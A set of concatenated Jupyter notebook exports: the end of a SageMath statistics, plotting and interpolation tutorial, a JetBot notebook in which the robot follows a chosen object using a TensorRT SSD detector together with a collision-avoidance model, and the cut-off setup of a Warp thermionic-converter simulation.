Median: 1
Mode: [3]
Standard deviation: 2*sqrt(29/13)
Variance: 116/13
Moving average (5): [3/5, 0, 2/5, -2/5, -1, 3/5, 8/5, 0, 1/5]
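###Markdown
Note that these results are exact: the mean is a rational number and the standard deviation is a symbolic square root. If you prefer floating-point values, you can ask for a numerical approximation with `n()`:
###Code
print( mean(L).n() )
print( std(L).n() )
###Output
_____no_output_____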
###Markdown
You can also compare your data to a probability distribution, see [this page](https://doc.sagemath.org/html/en/reference/probability/sage/probability/probability_distribution.html). If you need to do more advanced statistics you should consider using [R](https://www.r-project.org/); you can also use it inside Sage. Plotting**Reference:** [[15](https://doc.sagemath.org/html/en/reference/plotting/index.html)], more specifically the subsection [[16](https://doc.sagemath.org/html/en/reference/plotting/sage/plot/plot.html)].Some Sage objects can be plotted:
###Code
f = sin(x)
plot(f)
###Output
_____no_output_____
###Markdown
Sage's plotting functions are based on Python's [matplotlib](https://matplotlib.org/).You can give a number of options to adjust the aspect of your plot, see [here](https://doc.sagemath.org/html/en/reference/plotting/sage/plot/plot.htmlsage.plot.plot.plot). Let's see some of them:
###Code
f = sin(x)
p = plot(f,
-2*pi, 2*pi, # bounds for x
ymin = -1.1, ymax = 1.1, # bounds for y
color = "red",
title = "The sin function",
)
print("hello")
show(p)
###Output
hello
###Markdown
Some of the options are not described precisely in Sage's documentation, but you can find them in [matplotlib's documentation](https://matplotlib.org/stable/contents.html). You can find many examples online for adjusting your plot as you like! If you need to plot more than one object at a time, you can sum two plots and show them together with `show()`:
###Code
cosine = plot(cos(x), (x,-pi/2,pi/2), color="red")
exponential = plot(exp(x), (x,-2,0.5))
show(cosine + exponential) # works like print()
###Output
_____no_output_____
###Markdown
Finally, there are other types of plots that you can use, like [scatter plots](https://doc.sagemath.org/html/en/reference/plotting/sage/plot/scatter_plot.htmlsage.plot.scatter_plot.scatter_plot) and [bar charts](https://doc.sagemath.org/html/en/reference/plotting/sage/plot/bar_chart.htmlsage.plot.bar_chart.bar_chart). You can also add [text](https://doc.sagemath.org/html/en/reference/plotting/sage/plot/text.htmlsage.plot.text.text) to your plot:
###Code
b = bar_chart(range(1,10))
s = scatter_plot([(1,5), (4,2), (8,8), (4,7)],
marker = "*", # symbol
markersize = 100,
edgecolor = "green",
facecolor = "red"
)
t = text("wow, such plot!", (1, 8), color="black", fontsize=20)
show(b + s + t)
###Output
_____no_output_____
###Markdown
Interpolation**References:** [[17](https://doc.sagemath.org/html/en/reference/polynomial_rings/sage/rings/polynomial/polynomial_ring.htmlsage.rings.polynomial.polynomial_ring.PolynomialRing_field.lagrange_polynomial)] and [[18](https://doc.sagemath.org/html/en/reference/calculus/sage/calculus/interpolation.html)].When you need to work with a discrete set of data, like measurements of real-world quantities, it can be useful to visualize a "smoothed out" version of this data, for example by plotting a function that approximates it.One way to do so is to find the lowest-degree polynomial that passes through all your points. This is called the [Lagrange polynomial](https://en.wikipedia.org/wiki/Lagrange_polynomial).
###Code
points = [ (0,1), (1,2), (1.5,0), (2,4), (3,5) ]
polring.<x> = QQ[] # you need to specify a polynomial ring
lp = polring.lagrange_polynomial(points)
show(scatter_plot(points, facecolor="red")
+ plot(lp, 0, 3) # slightly different notation for polynomials
+ text(lp, (1,8), color="black")
)
###Output
_____no_output_____
###Markdown
One can compute the Lagrange polynomial over any base ring, and it has the advantage that it is a very "nice" function (continuous and differentiable as much as you like, with easily computable derivatives and primitives).However, it does not always give you a good approximation of your data:
###Code
R = [x/10 for x in range(-10,10)]
L = [1/(1+25*x^2) for x in R]
points = [(R[i], L[i]) for i in range(len(L))]
polring.<x> = RR[]
lp = polring.lagrange_polynomial(points)
show(plot(lp, -0.92, 0.82) + scatter_plot(points))
###Output
_____no_output_____
###Markdown
This particular example is called [Runge's phenomenon](https://en.wikipedia.org/wiki/Runge%27s_phenomenon). For a better approximation you can use a [spline](https://en.wikipedia.org/wiki/Spline_(mathematics)), which is a *piecewise* polynomial function:
###Code
show(plot(spline(points), -1, 1) + scatter_plot(points))
###Output
_____no_output_____ |
notebooks/object_following/01_live_demo.ipynb | ###Markdown
Object Following This notebook shows how to make JetBot follow an object. It builds on the collision avoidance demo: the robot follows the target object while the scene is judged "free" (go straight). For object detection we use an ssd_mobilenet_v2 model pre-trained on the [COCO dataset](http://cocodataset.org), which covers 90 common object classes. We use a version of this model converted to TensorRT; because the TensorRT version differs between JetPack releases, the engine must be run in the same environment (same TensorRT version) it was converted with. The objects that can be followed are the ones learned from the COCO dataset, for example:* person (index 1)* cup (index 47)and many more (the full list of class indices is in the [label file](https://github.com/tensorflow/models/blob/master/research/object_detection/data/mscoco_complete_label_map.pbtxt)). Index 0 is background; classification and detection models usually reserve a background label to represent the "nothing detected" state. The pre-trained model is based on the one published with the [Tensorflow Object Detection API](https://github.com/tensorflow/models/tree/master/research/object_detection) and has already been converted to TensorRT. You can also use the ``Tensorflow Object Detection API`` to train on your own data on a desktop PC or a cloud server. Converting ssd_mobilenet_v2_coco to TensorRT makes the object detection model run much faster, fast enough for real time on the Jetson Nano. This notebook, however, does not go through training on the COCO dataset or any other optimization steps. Also, because the TensorRT API changes frequently between versions, an ssd_mobilenet_v2_coco.engine that worked on another JetPack version cannot be used.> This notebook runs on a JetBot built with a Jetson Nano 4GB and JetPack 4.3. > It has not been tested on the Jetson Nano 2GB (JetPack 4.4 or later) or on the Jetson Nano 4GB with JetPack 4.4 or later.Let's get started. Camera setup First, initialize the camera. The object detection model takes 300x300-pixel images as input, so we set the camera resolution to 300x300.> Internally, the Camera class uses GStreamer and the Jetson Nano's image signal processor (ISP). This is vastly faster than doing the resizing on the CPU.
###Code
########################################
# 利用するライブラリを読み込みます。
########################################
from jetbot import Camera # JetBot用に用意したカメラライブラリを利用します。
########################################
# カメラを有効化します。
# 画像はwidthとheightで指定したピクセルサイズにリサイズされます。
# ssd_mobilenet_v2_cocoは300x300の入力層のため、カメラ画像は300x300にリサイズします。
# fpsのデフォルトは21ですが、カメラフレーム更新に連動して推論を実行するようにコーディングしているため、
# 処理が重くなってしまいます。そのためfpsを小さく設定します。
########################################
camera = Camera(width=300, height=300, fps=5)
###Output
_____no_output_____
###Markdown
Using the pre-trained SSD engine Import the [ObjectDetector](https://github.com/NVIDIA-AI-IOT/jetbot/blob/master/jetbot/object_detection.py) class and load ``ssd_mobilenet_v2_coco.engine``. Download the [ssd_mobilenet_v2_coco.engine](https://drive.google.com/file/d/1KjlDMRD8uhgQmQK-nC2CZGHFTbq4qQQH/view) built for JetPack 4.3 and upload ``ssd_mobilenet_v2_coco.engine`` to the same folder as this notebook in JupyterLab. Load the SSD MobileNet V2 model
###Code
########################################
# 利用するライブラリを読み込みます。
########################################
from jetbot import ObjectDetector # JetBot用に用意した物体検出ライブラリを利用します。
########################################
# TensorRTの物体検出モデルを読み込みます。
########################################
model = ObjectDetector('ssd_mobilenet_v2_coco.engine')
###Output
_____no_output_____
###Markdown
Internally, the ``ObjectDetector`` class runs the model using the TensorRT Python API. It also performs the pre-processing of the model input as well as the parsing of the detected objects. For now it only works with models created with the ``jetbot.ssd_tensorrt`` package; that package contains the utilities for converting models from the Tensorflow Object Detection API into optimized TensorRT engines. Next, let's run the network on the camera input. By default the ``ObjectDetector`` class expects the ``bgr8`` format that the camera produces. However, if you want to use a different input format you can override the default pre-processing function.
###Code
########################################
# 利用するライブラリを読み込みます。
########################################
import cv2
########################################
# 物体検出はTensorflowで学習されたモデルを使っています。このモデルは学習時にRGB画像フォーマットで学習されています。
# そのモデルをTensorRTモデルに変換したものがssd_mobilenet_v2_coco.engineです。
# 物体検出モデルの入力データはRGBフォーマットに変換する方が精度がよくなりますが、
# BGR->RGB変換をObjectDetectorクラスが実行しているため、
# このノートブックにおける物体検出の入力データはOpenCVカメラ画像のBGRフォーマットのまま渡すことになります。
########################################
detections = model(camera.value)
print(detections) # 推論結果を表示します。
###Output
_____no_output_____
###Markdown
If there are any COCO objects in the camera image, their information is stored in the ``detections`` variable. Display the detections in a text area Using the following code, we show the information about the detected objects in a text area widget.
###Code
########################################
# 利用するライブラリを読み込みます。
########################################
from IPython.display import display
import ipywidgets.widgets as widgets
detections_widget = widgets.Textarea() # テキストウィジェットを作成します。
detections_widget.value = str(detections) # テキストウィジェットに検出したオブジェクトの情報を反映します。
display(detections_widget) # テキストウィジェットを表示します。
###Output
_____no_output_____
###Markdown
The label ID, confidence, and bounding-box coordinates of every object detected in the camera image are displayed. As a leftover of mini-batch training, where several images are learned at once, the model also expects a batch of images as input at prediction time. Since we only use a single camera here, the model input is an array holding a single image. To display only the first object detected in the first image, you can call it as follows.> If no object is detected this raises an error, so we handle it with try-except.
###Code
image_number = 0 # Index of the first image in the batch given at inference time. Always 0 here because only one image is passed.
object_number = 0 # Index of the detection to read from the array of detected objects. It can be non-zero when several objects are detected; when nothing is detected the entry does not exist.
try:
print(detections[image_number][object_number])
except:
print("object not found")
###Output
_____no_output_____
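###Markdown
As an optional aside (a small sketch, not required for the rest of the notebook), you can also filter the raw detections yourself, for example keeping only non-background detections with a reasonable confidence. Each detection is a dictionary with 'label', 'confidence' and 'bbox' keys, as used later in this notebook.
###Code
# Keep only detections that are not background (label 0) and have confidence above 0.5
confident_detections = [d for d in detections[image_number] if d['label'] != 0 and d['confidence'] > 0.5]
print(len(confident_detections))
###Output
_____no_output_____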
###Markdown
Control the robot to follow the central object Next, let's have the robot follow an object of the specified class. To do this, we proceed as follows: 1. Detect objects that match the specified class. Check the [label file](https://github.com/tensorflow/models/blob/master/research/object_detection/data/mscoco_complete_label_map.pbtxt) for the label IDs and the objects they correspond to. 2. Select the object closest to the center of the camera's field of view. When it belongs to the specified class, this becomes the target to follow. 3. Steer the robot towards the target object. 4. Since collision avoidance is the base behavior, the robot turns left whenever it judges that it is blocked by an obstacle.> There are several versions of the label file. The Tensorflow labels cover 80 objects, so the file contains some unnamed labels. [About the labels of the COCO dataset](https://tech.amikelive.com/node-718/what-object-categories-labels-are-in-coco-dataset/) We also create a few widgets used to control the label of the target object and the speed of the robot. `turn gain` controls how fast the robot turns, based on the distance between the target object and the center of the robot's field of view. First, we load the collision avoidance model. As in the collision avoidance example, we recommend using a model that works well in your actual environment.
###Code
########################################
# 利用するライブラリを読み込みます。
########################################
import torch
import torchvision
import torch.nn.functional as F
import cv2
import numpy as np
########################################
# 衝突回避モデルを読み込みます。
########################################
collision_model = torchvision.models.alexnet(pretrained=False)
collision_model.classifier[6] = torch.nn.Linear(collision_model.classifier[6].in_features, 2)
collision_model.load_state_dict(torch.load('../collision_avoidance/best_model.pth'))
########################################
# GPU処理が可能な部分をGPUで処理するように設定します。
# モデルを評価モードにします。
# モデルをfloat16型に変換します。
########################################
device = torch.device('cuda')
collision_model = collision_model.to(device)
collision_model = collision_model.eval().half()
########################################
# この値はpytorch ImageNetの学習に使われた正規化(ImageNetデータセットのRGB毎に平均を0、標準偏差が1になるようにスケーリングすること)のパラメータです。
# カメラ画像はこの値でRGBを正規化することが望ましいでしょう。
# ここではtransforms.ToTensor()を使っていないため、正規化前のRGB値の範囲は[0, 255]です。
# そこで、学習時のRGB各範囲と同じ範囲にスケーリングするように正規化パラメータに255.0を掛けて設定します。
########################################
mean = 255.0 * np.array([0.485, 0.456, 0.406])
stdev = 255.0 * np.array([0.229, 0.224, 0.225])
########################################
# 正規化する関数を定義します。
# torchvision.transforms.Normalizeクラスはインスタンス化すると
# torch.nn.functional.normalize関数を返します。
# ソースコード:
# https://pytorch.org/docs/stable/_modules/torchvision/transforms/transforms.html#Normalize
# https://pytorch.org/docs/stable/_modules/torch/nn/functional.html#normalize
#########################################
normalize = torchvision.transforms.Normalize(mean, stdev)
########################################
# カメラ画像をモデル入力用データに変換します。
########################################
def preprocess(camera_value):
# OpenCVで取得したカメラ画像を変数xにコピーします。
x = camera_value
# 画像解像度を300x300から224x224に変更します。
x = cv2.resize(x, (224, 224))
# 学習時の画像データはtorchvision.datasets.ImageFolderを使って読み込んでいるため、モデルはRGBフォーマットの画像で学習しています。
# カメラ映像はOpenCVで読み込んでいるため画像はBGRフォーマットになっています。これをRGBフォーマットに変換します。
x = cv2.cvtColor(x, cv2.COLOR_BGR2RGB)
# 画像フォーマットをHWCからCHWに変換します。
x = x.transpose((2, 0, 1))
# float32に変換します。
x = torch.from_numpy(x).float()
# 正規化します。
x = normalize(x)
# GPUデバイスを利用します。float16に変換します。
x = x.to(device).half()
# バッチ配列に変換します。
x = x[None, ...]
# 入力用データxを返します。
return x
###Output
_____no_output_____
###Markdown
Create a robot instance to control the motors.
###Code
########################################
# 利用するライブラリを読み込みます。
########################################
from jetbot import Robot # JetBotを制御するためのライブラリを利用します。
########################################
# JetBotの制御用クラスをインスタンス化します。
########################################
robot = Robot()
###Output
_____no_output_____
###Markdown
Create the control widgets and the function that runs the models on each camera update.
###Code
########################################
# 利用するライブラリを読み込みます。
########################################
from jetbot import bgr8_to_jpeg # JetBot用に用意した画像変換ライブラリを利用します。
########################################
# 「blocked」の確率を表示するためのスライダーを用意します。
########################################
blocked_widget = widgets.FloatSlider(min=0.0, max=1.0, value=0.0, description='blocked')
########################################
# 画像表示用のウィジェットを用意します。
# widthとheightは表示するウィジェットの幅と高さです。
# カメラ画像サイズと一致する必要はありません。
########################################
image_widget = widgets.Image(format='jpeg', width=300, height=300)
########################################
# 追跡対象のラベル名を選択するためのウィジェットを作成します。
# ラベル名は学習済みモデルssd_mobilenet_v2_coco.engineが持つラベル名になります。
# 追跡対象はpersonとしておきます。
########################################
label_widget = widgets.Dropdown(
options=['person', 'bicycle', 'car', 'motorcycle', 'airplane', 'bus', 'train', 'truck', 'boat', 'traffic light',
'fire hydrant', '12', 'stop sign', 'parking meter', 'bench', 'bird', 'cat', 'dog', 'horse', 'sheep',
'cow', 'elephant', 'bear', 'zebra', 'giraffe', '26', 'backpack', 'umbrella', '29', '30',
'handbag', 'tie', 'suitcase', 'frisbee', 'skis', 'snowboard', 'sports ball', 'kite', 'baseball bat', 'baseball glove',
'skateboard', 'surfboard', 'tennis racket', 'bottle', '45', 'wine glass', 'cup', 'fork', 'knife', 'spoon',
'bowl', 'banana', 'apple', 'sandwich', 'orange', 'broccoli', 'carrot', 'hot dog', 'pizza', 'donut',
'cake', 'chair', 'couch', 'potted plant', 'bed', '66', 'dining table', '68', '69', 'toilet',
'71', 'tv', 'laptop', 'mouse', 'remote', 'keyboard', 'cell phone', 'microwave', 'oven', 'toaster',
'sink', 'refrigerator', '83', 'book', 'clock', 'vase', 'scissors', 'teddy bear', 'hair drier', 'toothbrush'],
value='person',
description='tracked label',
disabled=False
)
########################################
# JetBotの動作を調整するためのスライダーウィジェットを用意します。
########################################
speed_widget = widgets.FloatSlider(value=0.0, min=0.0, max=1.0, description='speed')
turn_gain_widget = widgets.FloatSlider(value=0.8, min=0.0, max=2.0, description='turn gain')
########################################
# ウィジェットの画像サイズを取得しておきます。
########################################
width = int(image_widget.width)
height = int(image_widget.height)
########################################
# 描画する文字のサイズを自動調整します。
########################################
fontScale = height/1000.0
if fontScale < 0.4:
fontScale = 0.4
fontThickness = 1 + int(fontScale)
fontFace = cv2.FONT_HERSHEY_SIMPLEX
########################################
# カメラ画像の中央を原点とした、
# 検出した追跡対象の中央座標(center_x, center_y)を取得します。
########################################
def detection_center(detection):
bbox = detection['bbox']
center_x = (bbox[0] + bbox[2]) / 2.0 - 0.5
center_y = (bbox[1] + bbox[3]) / 2.0 - 0.5
return (center_x, center_y)
########################################
# カメラ画像の中央と追跡対象の中央までの距離を取得します。
########################################
def norm(vec):
return np.sqrt(vec[0]**2 + vec[1]**2)
########################################
# 複数の追跡対象ターゲットのうち、もっとも画面中央に映っているターゲットを取得します。
########################################
def closest_detection(detections):
closest_detection = None
for det in detections:
center = detection_center(det)
if closest_detection is None:
closest_detection = det
elif norm(detection_center(det)) < norm(detection_center(closest_detection)):
closest_detection = det
return closest_detection
########################################
# カメラ画像が更新されたときに実行する処理を定義します。
########################################
def execute(change):
# カメラ画像を変数imageにコピーします。
image = change['new']
####################
# 衝突回避モデルを実行して、「blocked」かどうかを判断します。
####################
# 推論を実行します。
collision_output = collision_model(preprocess(image))
# collision_output.flatten()を呼び出すことで可能な限り不要な次元を除去します。([[blocked_rate, free_rate]]を[blocked_rate, free_rate]に変換)
# softmax()関数を適用して出力ベクトルの合計が1になるように正規化します(これにより確率分布になります)
# 入力データは多次元のバッチ配列になっています。出力もそれに対応しているためcollision_output.flatten()は多次元配列になっています。
# そのうえで、「blocked」の確率となるcollision_output.flatten()[0]の値を取得します。「free」の確率を取得する場合はcollision_output.flatten()[1]になります。
prob_blocked = float(F.softmax(collision_output.flatten(), dim=0)[0])
# 「blocked」の確率をスライダーに反映します。
blocked_widget.value = prob_blocked
####################
    # If the probability of "blocked" is greater than 50%, turn left.
    # Update the image display widget.
    # End this function here.
####################
if prob_blocked > 0.5:
robot.left(0.3)
image_widget.value = bgr8_to_jpeg(image)
return
####################
    # If the probability of "blocked" is 50% or less, i.e. "free", run object detection.
####################
# 物体検出モデルの実行コード内でBGR->RGB変換をおこなっているため、
# ここではOpenCVカメラ画像のBGRフォーマットのまま渡します。
detections = model(image)
# 検出した物体の情報を表示します。
display_str = []
display_str.append("detection info")
for det in detections[0]: # 検出した物体を一つ一つ解析します。
if det['label'] == 0: # 検出結果のうち、ラベル番号0は背景のためスキップします。
# background. skip
continue
if det['confidence'] <= 0.2: # スコアが低い場合。ここでは確認のために検出したものとしてpassします。
# bad score. skip
#continue
pass
bbox = det['bbox'] # 検出した物体の範囲を表す長方形のx,y座標を取得します。
score = det['confidence'] # 検出した物体のスコア(確率)を取得します。
label = det['label'] # 検出した物体のラベル番号を取得します。
cv2.rectangle(image, (int(width * bbox[0]), int(height * bbox[1])), (int(width * bbox[2]), int(height * bbox[3])), (255, 0, 0), 2) # 検出した物体を青色の長方形で囲みます。
display_str.append("label:{} score:{:.2f}".format(label_widget.options[int(label)-1], score)) # ラベル名とスコアを文字列の配列に追加します。
#cv2.putText(image, display_str, org=(10, 20+20*num_detection), fontFace=fontFace, fontScale=fontScale, thickness=fontThickness, color=(77, 255, 9))
####################
# 検出した物体のラベル名とスコアを画像に描画します。
# 描画位置やパディングは画像サイズと文字数から、見やすくなるように計算して描画します。
####################
max_text_width = 0
max_text_height = 0
if len(display_str) > 0:
[(text_width, text_height), baseLine] = cv2.getTextSize(text=display_str[0], fontFace=fontFace, fontScale=fontScale, thickness=fontThickness)
x_left = int(baseLine)
y_top = int(baseLine)
for i in range(len(display_str)):
[(text_width, text_height), baseLine] = cv2.getTextSize(text=display_str[i], fontFace=fontFace, fontScale=fontScale, thickness=fontThickness)
if max_text_width < text_width:
max_text_width = text_width
if max_text_height < text_height:
max_text_height = text_height
for i in range(len(display_str)):
cv2.putText(image, display_str[i], org=(x_left, y_top + int(max_text_height*1.2 + (max_text_height*1.2 * i))), fontFace=fontFace, fontScale=fontScale, thickness=fontThickness, color=(77, 255, 9))
####################
# 検出した物体が追跡対象のラベルと一致している場合、その情報を取得します。
# ラベル番号は、物体検出の結果は0が背景、1が「person」ラベルになります。
# ラベル選択ウィジェットのドロップダウンリストの配列は背景を選択しないようにしているため、
# 0が「person」ラベルになります。そのため、ラベル選択ウィジェットのインデックスに+1したものが物体検出のラベル番号と一致することになります。
####################
matching_detections = [d for d in detections[0] if d['label'] == int(label_widget.index)+1]
####################
# 追跡対象の物体のうち、画面中央にもっとも近い物体を追跡対象とします。
####################
target = closest_detection(matching_detections)
####################
# 追跡対象となる物体が存在する場合は、物体を緑色の長方形で囲みます。
####################
if target is not None:
bbox = target['bbox']
cv2.rectangle(image, (int(width * bbox[0]), int(height * bbox[1])), (int(width * bbox[2]), int(height * bbox[3])), (0, 255, 0), 5)
####################
# 追跡対象となる物体が存在しない場合は、衝突回避の「free」と同じように前進します。
####################
if target is None:
robot.forward(float(speed_widget.value))
####################
# 追跡対象となる物体が存在する場合は、物体の中心方向を向くようにモーターを制御します。
####################
else:
center = detection_center(target)
robot.set_motors(
float(speed_widget.value + turn_gain_widget.value * center[0]),
float(speed_widget.value - turn_gain_widget.value * center[0])
)
####################
# 画像表示ウィジェットを更新します。
####################
image_widget.value = bgr8_to_jpeg(image)
###Output
_____no_output_____
###Markdown
We have now written a function that goes from model inference all the way to controlling the JetBot. Next we need to make it run whenever the camera image is updated. In JetBot the Camera class is implemented as a subclass of traitlets.HasTraits, so this only requires calling observe(). Let's run the JetBot The following code creates a ``start jetbot`` button and a ``stop jetbot`` button. Pressing ``start jetbot`` initializes the models and the JetBot starts moving. Pressing ``stop jetbot`` stops the JetBot. Memory initialization happens when the very first frame is processed, so, as with any deep learning model, processing the first frame takes a little longer.
###Code
########################################
# 利用するライブラリを読み込みます。
########################################
import ipywidgets
import time
########################################
# スタートボタンとストップボタンを作成します。
########################################
model_start_button = ipywidgets.Button(description='start jetbot')
model_stop_button = ipywidgets.Button(description='stop jetbot')
########################################
# スタートボタンがクリックされた時に呼び出す関数を定義します。
########################################
def start_model(c):
execute({'new': camera.value}) # execute()関数を1回呼び出して初期化します。
camera.observe(execute, names='value') # Cameraクラスのtraitlets.Any()型のvalue変数(カメラ画像データ)が更新されたときに指定した関数を呼び出します。
model_start_button.on_click(start_model) # startボタンがクリックされた時に指定した関数を呼び出します。
########################################
# ストップボタンがクリックされた時に呼び出す関数を定義します。
########################################
def stop_model(c):
camera.unobserve(execute, names='value') # カメラ画像データの更新と指定した関数の連動を解除します。
time.sleep(1) # 実行中の処理が完了するまで少し待ちます。
robot.stop() # モーターを停止します。
model_stop_button.on_click(stop_model) # stopボタンがクリックされた時に指定した関数を呼び出します。
########################################
# ウィジェットの表示レイアウトを定義します。
########################################
model_widget = ipywidgets.VBox([
image_widget,
ipywidgets.HBox([label_widget, blocked_widget]),
ipywidgets.HBox([speed_widget, turn_gain_widget]),
ipywidgets.HBox([model_start_button, model_stop_button])
])
########################################
# ウィジェットを表示します。
########################################
display(model_widget)
###Output
_____no_output_____
###Markdown
It works! When the target is detected it is marked with a green box, and detected objects other than the target are shown with blue boxes. When the collision avoidance model decides "blocked" (turn), the JetBot turns left. When the collision avoidance model decides "free" (go straight) and a target is detected, the JetBot moves so as to follow the target. When the collision avoidance model decides "free" and no target is detected, the JetBot simply drives straight, just like the collision avoidance demo. Stop the camera Finally, stop the camera used in this notebook so that it can be used by other notebooks.
###Code
camera.stop() # Stop the camera.
###Output
_____no_output_____ |
examples/thermionic_energy_convertors/Enhanced_Warp_Thermionic_Converter.ipynb | ###Markdown
Enhanced features for a Simple Warp Interface for Thermionic Converters**5/10/2017**This version of the original "Develop_Warp_Thermionic_Converter" notebook includes additional features for improving the GUI for electrostatic simulations.These improvements include specific features for the simulation control palette in the visualization tab of the GUI:1. Isolated code to quickly compute a converged electric potential for the user-defined grid2. A script to compute an estimated "expected" time of flight for an electron across the gap.5/10/2017Nathan Cook
###Code
%matplotlib inline
%load_ext autoreload
%autoreload 2
from __future__ import division
import sys
del sys.argv[1:] # Necessary to run 'from warp import *' in IPython notebook without conflict.
from warp import *
import numpy as np
import matplotlib.pyplot as plt
import os
import pickle
import h5py
from re import findall
from scipy.special import erfinv
from datetime import datetime
import rswarp
from warp.data_dumping.openpmd_diag import ParticleDiagnostic
from rswarp.diagnostics import FieldDiagnostic
from rswarp.utilities.file_utils import cleanupPrevious
from rswarp.utilities.file_utils import readparticles
from rswarp.utilities.file_utils import loadparticlefiles
from rswarp.cathode import sources
from rswarp.cathode import injectors
# Constants imports
from scipy.constants import e, m_e, c, k
kb_eV = 8.6173324e-5 #Boltzmann constant in eV/K
kb_J = k #Boltzmann constant in J/K
m = m_e
###Output
# Warp
# Origin date: Thu, 27 Apr 2017 22:31:05 +0000
# Local date: Thu, 27 Apr 2017 22:31:05 +0000
# Commit hash: 8d81829
# /Users/ncook/.virtualenvs/rswarp_env/lib/python2.7/site-packages/warp/warp.pyc
# /Users/ncook/.virtualenvs/rswarp_env/lib/python2.7/site-packages/warp/warpC.so
# Thu May 11 00:14:15 2017
# import warp time 0.246575117111 seconds
# For more help, type warphelp()
###Markdown
Diagnostics
###Code
diagDir = 'diags/xzsolver/hdf5/'
field_base_path = 'diags/fields/'
diagFDir = {'magnetic':'diags/fields/magnetic','electric':'diags/fields/electric'}
# Cleanup previous files
cleanupPrevious(diagDir,diagFDir)
###Output
_____no_output_____
###Markdown
Grid parametersThe grid parameters comprise one of the primary sets of user inputs, and are required for initializing the grid, pre-calculating fundamental currents, and generating the solver. These values are also used throughout visualization scripts.**'Physical' Grid Parameters. These are physically intuitive values for a simple domain specification:**1. `PLATE_SPACING` - The longitudinal distance (z-axis) between cathode and anode2. `CHANNEL_WIDTH` - The transverse dimension of the simulation domain**Technical Grid Parameters. These provide the required inputs for constructing simulation objects, but may be computed from the physical parameters above for a simple rectangular geometry:**1. `X_MIN, X_MAX` - By default, the horizontal domain is `(-0.5*CHANNEL_WIDTH,0.5*CHANNEL_WIDTH)`2. `Z_MIN, Z_MAX` - By default, the longitudinal domain is `[0, PLATE_SPACING]`3. `Y_MIN, Y_MAX` - The ignorable plane, but specified for completeness. Defaults to `(-0.5*CHANNEL_WIDTH,0.5*CHANNEL_WIDTH)`4. `NUM_X` - The number of grid points along x.5. `NUM_Y` - The number of grid points along y (ignorable for 2DXZ geometry).6. `NUM_Z` - The number of grid points along z.
###Code
#GLOBAL GEOMETRY PARAMETERS FOR USERS
PLATE_SPACING = 10e-6 #plate spacing
CHANNEL_WIDTH = 110e-9 #width of simulation box
#Dimensions
X_MAX = CHANNEL_WIDTH*0.5
X_MIN = -1.*X_MAX
Y_MAX = CHANNEL_WIDTH*0.5
Y_MIN = -1.*Y_MAX
Z_MIN = 0.
Z_MAX = PLATE_SPACING
#Grid parameters
NUM_X = 11
NUM_Y = 64
NUM_Z = 512
#z step size
dz = (Z_MAX - Z_MIN)/NUM_Z
###Output
_____no_output_____
###Markdown
Solver Geometry and BoundariesThe solver geometry is a fundamental pre-requisite for any interface or simulation setup. We will assume for now that we are fixing a 2D X-Z geometry, with the Y axis as an ignorable plane. **`w3d.solvergeom = w3d.XZgeom`**Future extensions to the interface will support 3D geometries. Where applicable and simple, small code snippets have been included in anticipation of this feature. However, by no means are these scripts fully compliant with 3D simulations.
###Code
#Specify solver geometry
w3d.solvergeom = w3d.XZgeom
assert w3d.solvergeom == w3d.XZgeom, \
'Solver geometry required to be w3d.XZgeom'
# Set boundary conditions
# Longitudinal conditions overriden by conducting plates
w3d.bound0 = neumann
w3d.boundnz = dirichlet
w3d.boundxy = periodic
# Particles boundary conditions
top.pbound0 = absorb
top.pboundnz = absorb
top.pboundxy = periodic
# Set grid boundaries
w3d.xmmin = X_MIN
w3d.xmmax = X_MAX
w3d.zmmin = 0.
w3d.zmmax = Z_MAX
# Set grid counts
w3d.nx = NUM_X
w3d.nz = NUM_Z
zmesh = np.linspace(0,Z_MAX,NUM_Z+1) #holds the z-axis grid points in an array
###Output
_____no_output_____
###Markdown
Source parameterizationThis section covers source parameterization, in particular how the electrons are emitted from the cathode. Warp permits several options. We want to support three options. For simplicity, I've defined the `USER_INJECT` flag which corresponds to the three possible options:1. Constant emission - user specifies current. `USER_INJECT = 1`2. Child-Langmuir emission (computed from geometries) - user selects and current is computed and displayed `USER_INJECT = 2`3. Thermionic emission (computed from cathode temperature) - user selects and current is computed and displayed `USER_INJECT = 3`**Note that the following USER PARAMETERS are needed for the essential specification of the beam:**1. Instantiation via species command i.e. `beam = Species(type=Electron, name='beam')`2. beam radii in x,y via a0, b0 (`beam.a0 = 0.5*BEAM_WIDTH`). In many cases, `BEAM_WIDTH = CHANNEL_WIDTH`.3. beam current (`beam.ibeam = BEAM_CURRENT`)4. Cathode temperature in Kelvin (`CATHODE_TEMP`). Should default to 4K.5. Minimum z-coordinate for injected particles (`Z_PART_MIN`). Must have `Z_PART_MIN > Z_MIN`.**The next set of parameters are generated from additional user parameters (grid, beam, etc.):**1. The injection type for the instance of `top` (`top.inject = 6`). This will be set to 6 (user injection) for most cases, determined by the `USER_INJECT` switch. 2. Number of particles to be injected per step (`top.npinject`). This is computed from grid parameters and defaults to 10 particles per horizontal cell (e.g. `10*NUM_X`). 3. Injection coordinate determination - analytical vs. interpolated (`w3d.l_inj_exact`). Defaults to false for most injection types. 4. Variance of thermal particle velocity distribution in z (`beam.vthz`). Defaults to 0. 5. Variance of thermal particle velocity distribution in transverse plane (`beam.vthperp`). Defaults to 0.The `rswarp` repository has been updated with a cathode module to streamline the designation of cathode sources via each of these three methods. Below we will demonstrate their use and provide a simple template.
###Code
#Cathode and anode settings
CATHODE_TEMP = 1273.15 #1100. #1273.15 #1000. #cathode temperature in K
CATHODE_PHI = 2.0 #work function in eV
ANODE_WF = 0.1
GRID_BIAS = 0.4 #voltage applied to any grid of electrodes
vacuum_level = CATHODE_PHI - ANODE_WF + GRID_BIAS
#compute beam cutoff velocity for time-step determinance
beam_beta = sources.compute_cutoff_beta(CATHODE_TEMP)
#Compute Child-Langmuir limit for this setup A/m^2
cl_limit = sources.cl_limit(CATHODE_PHI, ANODE_WF, GRID_BIAS, PLATE_SPACING)
#INJECTION SPECIFICATION
USER_INJECT = 1
# --- Setup simulation species
beam = Species(type=Electron, name='beam')
# --- Set basic beam parameters
SOURCE_RADIUS_1 = 0.5*CHANNEL_WIDTH #a0 parameter - X plane
SOURCE_RADIUS_2 = 0.5*CHANNEL_WIDTH #b0 parameter - Y plane
Z_PART_MIN = dz/8. #starting particle z value
#Compute cathode area for geomtry-specific current calculations
if (w3d.solvergeom == w3d.XYZgeom):
#For 3D cartesion geometry only
cathode_area = 4.*SOURCE_RADIUS_1*SOURCE_RADIUS_2
else:
#Assume 2D XZ geometry
